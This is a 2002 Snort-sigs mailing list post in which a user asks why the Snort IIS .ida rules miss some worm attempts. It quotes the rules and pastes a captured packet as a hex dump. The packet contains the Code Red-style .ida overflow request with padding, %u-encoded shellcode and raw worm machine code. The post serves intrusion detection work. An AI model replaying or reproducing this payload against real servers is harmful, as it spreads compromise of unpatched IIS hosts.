[Snort-sigs] Signatures for .ida attempt

robert rroot at ...254...
Wed Jan 16 13:23:04 EST 2002


On Tue, 15 Jan 2002 16:58:00 -0500, you wrote:

>I've been using a windows build of snort for about a month now.
>I have caught a few .ida attempts which have slipped past the 
>rule sets for some reason. <all within the past week>
>
>Going over the web-iis.rules which contain the .ida attempt rules,
>I can not figure out where / why the rules are not catching the 
>attempt to install the worm.
>
>Would this be the correct forum to cut & paste the packets, for 
>discussion on creating <or modifying> a rule to catch these?
>
>Robert

Ok, here goes.

For ease of reading, turn your word wrap feature off.

The rules from web-iis.rules I am looking at are:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS ISAPI .ida attempt"; uricontent:".ida?"; nocase; dsize:>239; flags:A+; reference:arachnids,552; classtype:web-application-attack; reference:cve,CAN-2000-0071; sid:1243; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS ISAPI .ida access"; uricontent:".ida"; nocase; flags:A+; reference:arachnids,552; classtype:web-application-activity; reference:cve,CAN-2000-0071; sid:1242; rev:2;)

Looking at this logically, I still can not figure this out. 
<not the rules, I understand them. but why this is happening>
1.  For the rules, the ".ida" trigger is part of the "URI" content.
2.  I am receiving these in a series of 3 or more packets.
3.  The first packet is an HTTP Get of only a few bytes,  which varies
4.  The second packet contains the ".ida" content
5.  In my system this <the .ida> is being reported as part of the "Request Method", not the URI
6.  Although the ".ida" is  reported as part of the "request method";  
    The rules catch these packets some of the times.
    Could this be particular to my OS? <win 2k>
    I am using winsock 2, sockets version 2.2.

I have studied the packets which triggered a rules alert 
and the packets which did not.
For the life of me, I can not figure out any reason why 
some ".ida" packets are getting caught / or slipping through.
At first I thought it was because my system is reporting the ".ida?" as part of the 
"Request Method" and not as part of the URI, but that was not it.
My system is showing all of the packets which contain ".ida?", as being part of the 
"Request Method".  Not just the ones which slipped through.

I mentioned I am receiving the ".ida?" data within the second packet of the 
original http GET request.  Could this be part of the cause.?
Does anyone know if usually the ".ida?> is contained within the first http GET?
My first http get contains only this:

  HTTP: GET Request (from client using port 3965)
      HTTP: Request Method = GET
      HTTP: Uniform Resource Identifier = 
3

00000:  00 01 02 87 97 19 00 20 78 D1 27 AF 08 00 45 00   ....... x.'...E.
00010:  00 2C 92 C4 40 00 6E 06 47 27 D8 B0 98 23 C0 A8   .,.. at ...258...'...#..
00020:  01 64 0F 7D 00 50 8A E0 0F C9 7A 02 9F 90 50 18   .d.}.P....z...P.
00030:  25 30 F8 48 00 00 47 45 54 20 01 33               %0.H..GET .3    

Notice the URI content only contains a hex 01 33.  This also varies from 
attempt to attempt. 
TCP flags are Ack & Push

I realize I could change the "uricontent" to "content" in the web-iis.rules.
Or add 2 more rules to my local.rules with "content:"
Or change the "/.ida?" to something like "HOST:www.worm.com" or the hex equivalent.
This would be a jury rig fix at best, for my particular system only.

I am snipping part of the packets that have no bearing.
Also I included notes to the right side. This shows where the 
"Request Method" and the "URI", starts and ends as reported by my OS.

Any thoughts, or slaps up beside the head?? <bg>
All are welcome.


 - -  begin tear line for packet - - - 

  IP: ID = 0x92C5; Proto = TCP; Len: 1400
      IP: Version = 4 (0x4)
      IP: Header Length = 20 (0x14)
      IP: Precedence = Routine
      IP: Type of Service = Normal Service
      IP: Total Length = 1400 (0x578)
      IP: Identification = 37573 (0x92C5)
      IP: Flags Summary = 2 (0x2)
          IP: .......0 = Last fragment in datagram
          IP: ......1. = Cannot fragment datagram
      IP: Fragment Offset = 0 (0x0) bytes
      IP: Time to Live = 110 (0x6E)
      IP: Protocol = TCP - Transmission Control
      IP: Checksum = 0x41DA
      IP: Source Address = 216.176.152.35
      IP: Destination Address = 192.168.1.100
      IP: Data: Number of data bytes remaining = 1380 (0x0564)
  TCP: .AP..., len: 1360, seq:2329939917-2329941277, ack:2046992272, win: 9520, src: 3965  dst:   80 
      TCP: Source Port = 0x0F7D
      TCP: Destination Port = Hypertext Transfer Protocol
      TCP: Sequence Number = 2329939917 (0x8AE00FCD)
      TCP: Acknowledgement Number = 2046992272 (0x7A029F90)
      TCP: Data Offset = 20 (0x14)
      TCP: Reserved = 0 (0x0000)
      TCP: Flags = 0x18 : .AP...
          TCP: ..0..... = No urgent data
          TCP: ...1.... = Acknowledgement field significant
          TCP: ....1... = Push function
          TCP: .....0.. = No Reset
          TCP: ......0. = No Synchronize
          TCP: .......0 = No Fin
      TCP: Window = 9520 (0x2530)
      TCP: Checksum = 0x12CF
      TCP: Urgent Pointer = 0 (0x0)
      TCP: Data: Number of data bytes remaining = 1360 (0x0550)
  HTTP: Request (from client using port 3965)
      HTTP: Request Method = /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
      HTTP: Uniform Resource Identifier = HTTP/1.0

00000:  00 01 02 87 97 19 00 20 78 D1 27 AF 08 00 45 00   ....... x.'...E.
00010:  05 78 92 C5 40 00 6E 06 41 DA D8 B0 98 23 C0 A8   .x.. at ...259...#..
00020:  01 64 0F 7D 00 50 8A E0 0F CD 7A 02 9F 90 50 18   .d.}.P....z...P.
00030:  25 30 12 CF 00 00 2F 64 65 66 61 75 6C 74 2E 69   %0..../default.i   note: This is the start of the "Request Method" 
00040:  64 61 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   da?NNNNNNNNNNNNN   it starts with "/default.ida" and continues 
00050:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN   down to the beginning of the URI
00060:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
00070:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
00080:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
00090:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
000A0:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
000B0:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
000C0:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
000D0:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
000E0:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
000F0:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
00100:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
00110:  4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
00120:  4E 4E 4E 25 75 39 30 39 30 25 75 36 38 35 38 25   NNN%u9090%u6858%
00130:  75 63 62 64 33 25 75 37 38 30 31 25 75 39 30 39   ucbd3%u7801%u909
00140:  30 25 75 36 38 35 38 25 75 63 62 64 33 25 75 37   0%u6858%ucbd3%u7
00150:  38 30 31 25 75 39 30 39 30 25 75 36 38 35 38 25   801%u9090%u6858%
00160:  75 63 62 64 33 25 75 37 38 30 31 25 75 39 30 39   ucbd3%u7801%u909
00170:  30 25 75 39 30 39 30 25 75 38 31 39 30 25 75 30   0%u9090%u8190%u0
00180:  30 63 33 25 75 30 30 30 33 25 75 38 62 30 30 25   0c3%u0003%u8b00%
00190:  75 35 33 31 62 25 75 35 33 66 66 25 75 30 30 37   u531b%u53ff%u007
001A0:  38 25 75 30 30 30 30 25 75 30 30 3D 61 20 20 48   8%u0000%u00=a  H    note: this is the start of the "URI"
001B0:  54 54 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74   TTP/1.0..Content    Evrything starting with the "HTTP/1.0"
001C0:  2D 74 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A   -type: text/xml.    and below is listed as part of the URI  
001D0:  48 4F 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F   HOST:www.worm.co    on my system
001E0:  6D 0A 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43   m. Accept: */*.C
001F0:  6F 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33   ontent-length: 3
00200:  35 36 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00   569 ....U.......
00210:  00 53 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8   .SVW............
00220:  CC CC CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00   ........p.......
00230:  E9 0A 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF   .......h........
00240:  FF 64 A1 00 00 00 00 89 47 08 64 89 3D 00 00 00   .d......G.d.=...
00250:  00 E9 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE   ..o.....`.......
00260:  FF FF FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89   ........h.......
00270:  85 F4 FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8   .......X......w.
00280:  9B 0A 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00   ......p.........
00290:  00 8B 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58   ...X...........X
002A0:  FE FF FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7   .....X......xu..
002B0:  85 58 FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33   .X.........X...3
002C0:  C0 66 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B   .f..=MZ.........
002D0:  8D 58 FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9   .X....Q<..X...3.
002E0:  66 8B 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00   f.....PE....y...
002F0:  8B 95 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B   ..X....B<..X....
00300:  54 01 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B   T.x..X.....T....
00310:  85 54 FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D   .T....H...X.....
00320:  4C FE FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E   L.....L....:KERN
00330:  0F 85 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45   ..3.....L....x.E
00340:  4C 33 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89   L32.. .....X....
00350:  8D 34 FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF   .4.....T.....X..
00360:  FF 03 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF   ..B ..L.....H...
00370:  00 00 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89   ........H.......
00380:  8D 48 FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95   .H.....L........
00390:  4C FE FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF   L.....T.....H...
003A0:  3B 48 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B   ;H.........L....
003B0:  02 8B 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85   ...X....<.GetP..
003C0:  A0 00 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE   ......L.......X.
003D0:  FF FF 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00   ...|..rocA......
003E0:  8B 95 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE   ..H.....H.....X.
003F0:  FF FF 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04   ....T....H$3.f..
00400:  0A 89 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10   ...L.....T....Q.
00410:  8B 85 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF   ..L....L....L...
00420:  8B 95 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE   ..L.....L.....L.
00430:  FF FF 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85   ....L.....X.....
00440:  54 FE FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF   T....H......L...
00450:  8B 85 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE   ..L.....X.....p.
00460:  FF FF EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD   ................
00470:  F0 FE FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70   .....G.d.......p
00480:  FE FF FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF   ....u..8.....L..
00490:  FF 01 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01   .........L......
004A0:  89 8D 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85   ..L.....h.......
004B0:  C0 0F 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11   .........h......
004C0:  83 FA 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4   ...u!..h........
004D0:  50 FF 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85   P......;..CKCK..
004E0:  34 FE FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B   4....*....h...Q.
004F0:  95 34 FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43   .4...R..p...;..C
00500:  4B 43 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF   KCK..L..........
00510:  EB 0F 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF   ....h........h..
00520:  FF 8B 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2   ...h........t...
00530:  8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9   ..h........h....
00540:  53 FF FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68   S.....h........h
00550:  FE FF FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE   ....M.........l.
00560:  FF FF C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE   ....L...........
00570:  FF FF 68 8B 45 08 89 85 D1 FE FF FF C7 85 D5 FE   ..h.E...........
00580:  FF FF 5B 53 53 FF                                 ..[SS.          


 - - - end tear line for packet  - - - 






More information about the Snort-sigs mailing list